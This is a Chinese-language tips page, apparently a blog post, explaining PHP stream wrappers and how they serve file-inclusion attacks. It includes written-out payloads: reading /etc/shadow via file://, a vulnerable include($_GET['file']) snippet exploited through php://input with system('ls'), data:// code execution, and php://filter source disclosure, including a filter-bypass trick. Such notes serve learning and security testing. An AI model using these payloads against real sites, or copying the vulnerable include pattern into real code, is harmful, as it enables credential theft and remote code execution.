首页Tips

支持的协议:

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — 安全外壳协议 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

file://

可以搭配fopen(),file_get_contents(),include()等函数搭配使用,支持相对、绝对和网络路径。但是我实测相对路径不用file://读取,直接读就可以了

file://./index.php        #相对路径读取文件#./index.php
file:///etc/shadow  #绝对路径读取
file://http://127.0.0.1/index.php   #网络路径读取

http:// & https://

通过HTTP 1.0的GET方法访问网络资源

$homepage = file_get_contents("https://www.bilibili.com/");
echo $homepage;

ftp://

这个还没弄懂怎么读,好像见的也比较少,先放放

php://

php://input

访问请求的原始数据的只读流,可以用来接收post的数据

$F = $_GET['file'];
include($F);

传post

http://127.0.0.1/?file=php://input
POST DATA: <?php echo system('ls'); ?>

php://output

是一个只写的数据流,可以像echo一样写入到输出中

$output = fopen("php://output", "w");
fwrite($output, "test");
fclose($output);

php://filter

用法: php://filter/筛选过滤方式/resource=<文件>

$F = "php://filter/read=convert.base64-encode/resource=t.php";
include($F);

字符串过滤器:

  • string.rot13 # 等同于用 str_rot13()函数,将26个英文字母的前面13个字符与后13个字符互换 (PHP 4.3.0)

  • string.toupper # 等同于用 strtoupper(),将字符串转换为大写 (PHP 5.0.0)

  • string.tolower # 同于用 strtolower(),将字符串转换为小写 (PHP 5.0.0)

  • string.strip_tags # 等同于用 strip_tags(),从字符串中去除html和php标签 (PHP 5.0.0)

转换过滤器:

  • convert.base64-encode

  • convert.base64-decode

  • convert.quoted-printable-encode#将 8-bit 字符串转换为quoted-printable 字符串。

  • convert.quoted-printable-decode#将 quoted-printable 字符串转换为 8-bit 字符串

  • convert.iconv

    在激活 iconv 的前提下可以使用 convert.iconv.* 压缩过滤器, 等同于用 iconv() 处理所有的流数据。 该过滤器不支持参数,但可使用输入/输出的编码名称,组成过滤器名称,比如 convert.iconv.<input-encoding>.<output-encoding>convert.iconv.<input-encoding>/<output-encoding>

    用法如上,当rot或者base被ban的时候可以通过修改字符编码的形式找出文件内容,可以使用类似php://filter/convert.iconv..UCS-2LE/resource=的方式弹出文件内容

压缩过滤器

  • zlib.deflate和 zlib.inflate # zlib.deflate是用zlib进行文件流加密。zlib.inflate是用zlib进行文件流解密

  • bzip2.compress和 bzip2.decompress # 同上

zip:// & bzip2:// & zlib://

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名

zip:// 处理的是.zip后缀的压缩包,compress.zlib:// 处理的是.gz后缀的压缩包,compress.bzip2:// 处理的是.bz2后缀的压缩包

zip://archive.zip#dir/file.txt
即zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]**要用绝对路径+url编码#

compress.bzip2:///etc/www/html/file.bz2
也可以相对路径
compress.bzip2://./file.bz2 #zlib同理

data://

data://资源类型;编码,内容 (data://也可以写成data:)

data://协议通过执行资源类型,使后面的内容当做文件内容来执行,从而造成任意代码执行

?file=data://text/plain,<?php phpinfo(); ?>

glob://

查找匹配的文件路径模式,需要搭配DirectoryIterator类

glob://[文件路径]/[文件名].[文件后缀]

$it = new DirectoryIterator($_GET['file']);
foreach($it as $f) {
 printf("%s", $f->getFilename());
    echo'</br>'; 
}

phar://

和zip类似

phar://./php.zip/php.txt